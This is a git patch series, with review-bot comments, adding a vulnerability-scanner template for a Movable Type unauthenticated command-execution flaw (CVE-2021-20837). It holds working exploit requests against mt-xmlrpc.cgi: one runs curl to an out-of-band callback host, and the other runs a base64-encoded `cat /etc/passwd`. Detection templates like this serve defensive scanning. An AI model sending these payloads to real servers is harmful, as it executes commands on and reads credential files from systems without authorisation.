From 83e431802eef6660eeb735e47dba87f3c5fa2b67 Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Mon, 10 Jan 2022 21:44:31 -0500
Subject: [PATCH 1/2] =?UTF-8?q?Create=20CVE-2021=E2=80=9320837.yaml?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
cves/2021/CVE-2021–20837.yaml | 37 +++++++++++++++++++++++++++++++++
1 file changed, 37 insertions(+)
create mode 100644 cves/2021/CVE-2021–20837.yaml
diff --git a/cves/2021/CVE-2021–20837.yaml b/cves/2021/CVE-2021–20837.yaml
new file mode 100644
index 0000000000..be3326855d
--- /dev/null
+++ b/cves/2021/CVE-2021–20837.yaml
@@ -0,0 +1,37 @@
+id: CVE-2021–20837
+
+info:
+ name: Unauthenticated RCE Vulnerability In MovableType
+ author: pikpikcu
+ severity: critical
+ description: Movable Type 7 r.5002 and earlier (Movable Type 7 Series), Movable Type 6.8.2 and earlier (Movable Type 6 Series), Movable Type Advanced 7 r.5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8.2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors.
+ tags: cve,cve2021,movabletype,rce
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-20837
+ - https://medium.com/@TutorialBoy24/an-unauthenticated-rce-vulnerability-in-movabletype-cve-2021-20837-70664b159dd7
+
+requests:
+ - raw:
+ - |
+ POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: text/xml
+
+
+
+ mt.handler_to_coderef
+
+
+
+ system("curl","http://{{interactsh-url}}")
+
+
+
+
+
+
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
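Review bot: The new file's path, `cves/2021/CVE-2021–20837.yaml`, and the `id` on the first added line both use an en dash (U+2013) between `2021` and `20837`, where the NVD reference URL in the same hunk uses an ASCII hyphen. The second patch on this page corrects `id` but its `diff --git` header still names the en-dash path, so a search, allow-list or exclusion keyed on the ASCII CVE id would presumably miss this file. Rename the file to `cves/2021/CVE-2021-20837.yaml` so the path and `id: CVE-2021-20837` agree.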
From 70677b3b5afc4b7f94ea51721bb170ee1a2313d8 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Tue, 11 Jan 2022 14:12:04 +0530
Subject: [PATCH 2/2] =?UTF-8?q?Update=20CVE-2021=E2=80=9320837.yaml?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
cves/2021/CVE-2021–20837.yaml | 27 +++++++++++++++++----------
1 file changed, 17 insertions(+), 10 deletions(-)
diff --git a/cves/2021/CVE-2021–20837.yaml b/cves/2021/CVE-2021–20837.yaml
index be3326855d..f417535f23 100644
--- a/cves/2021/CVE-2021–20837.yaml
+++ b/cves/2021/CVE-2021–20837.yaml
@@ -1,14 +1,13 @@
-id: CVE-2021–20837
-
+id: CVE-2021-20837
info:
name: Unauthenticated RCE Vulnerability In MovableType
author: pikpikcu
severity: critical
description: Movable Type 7 r.5002 and earlier (Movable Type 7 Series), Movable Type 6.8.2 and earlier (Movable Type 6 Series), Movable Type Advanced 7 r.5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8.2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors.
- tags: cve,cve2021,movabletype,rce
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2021-20837
- https://medium.com/@TutorialBoy24/an-unauthenticated-rce-vulnerability-in-movabletype-cve-2021-20837-70664b159dd7
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-20837
+ tags: cve,cve2021,movabletype,rce
requests:
- raw:
@@ -16,22 +15,30 @@ requests:
POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
-
+
mt.handler_to_coderef
-
- system("curl","http://{{interactsh-url}}")
-
+ YGNhdCAvZXRjL3Bhc3N3ZGA=
+ matchers-condition: and
matchers:
+ - type: regex
+ part: body
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
+
- type: word
- part: interactsh_protocol # Confirms the HTTP Interaction
+ part: header
words:
- - "http"
+ - "text/xml"
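Review bot: The added body matcher `"root:.*:0:0"` is looser than it needs to be, because `.*` is unbounded and nothing follows the last `0`. Closing it on the next field separator, `- "root:.*:0:0:"`, narrows what it accepts. Under `matchers-condition: and` the `status: 200` and `text/xml` header checks are satisfied by any ordinary XML-RPC reply, so this regex alone decides the verdict. The hunk also removes the `interactsh_protocol` matcher, so a host whose response does not echo command output would presumably be reported as not vulnerable. That false-negative case should be stated in `description`, or the template should keep an out-of-band confirmation alongside the body check.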